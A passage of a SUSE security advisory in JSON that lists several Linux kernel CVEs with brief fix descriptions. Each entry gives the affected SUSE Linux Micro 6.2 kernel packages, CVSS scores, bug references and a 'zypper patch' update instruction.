"title": "CVE-2025-38540"
},
{
"cve": "CVE-2025-38541",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38541"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7925: Fix null-ptr-deref in mt7925_thermal_init()\n\ndevm_kasprintf() returns NULL on error. Currently, mt7925_thermal_init()\ndoes not check for this case, which results in a NULL pointer\ndereference.\n\nAdd NULL check after devm_kasprintf() to prevent this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38541",
"url": "https://www.suse.com/security/cve/CVE-2025-38541"
},
{
"category": "external",
"summary": "SUSE Bug 1248216 for CVE-2025-38541",
"url": "https://bugzilla.suse.com/1248216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38541"
},
{
"cve": "CVE-2025-38543",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38543"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tegra: nvdec: Fix dma_alloc_coherent error check\n\nCheck for NULL return value with dma_alloc_coherent, in line with\nRobin\u0027s fix for vic.c in \u0027drm/tegra: vic: Fix DMA API misuse\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38543",
"url": "https://www.suse.com/security/cve/CVE-2025-38543"
},
{
"category": "external",
"summary": "SUSE Bug 1248214 for CVE-2025-38543",
"url": "https://bugzilla.suse.com/1248214"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38543"
},
{
"cve": "CVE-2025-38547",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38547"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: axp20x_adc: Add missing sentinel to AXP717 ADC channel maps\n\nThe AXP717 ADC channel maps is missing a sentinel entry at the end. This\ncauses a KASAN warning.\n\nAdd the missing sentinel entry.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38547",
"url": "https://www.suse.com/security/cve/CVE-2025-38547"
},
{
"category": "external",
"summary": "SUSE Bug 1248222 for CVE-2025-38547",
"url": "https://bugzilla.suse.com/1248222"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-38547"
},
{
"cve": "CVE-2025-38548",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38548"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (corsair-cpro) Validate the size of the received input buffer\n\nAdd buffer_recv_size to store the size of the received bytes.\nValidate buffer_recv_size in send_usb_cmd().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38548",
"url": "https://www.suse.com/security/cve/CVE-2025-38548"
},
{
"category": "external",
"summary": "SUSE Bug 1248228 for CVE-2025-38548",
"url": "https://bugzilla.suse.com/1248228"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
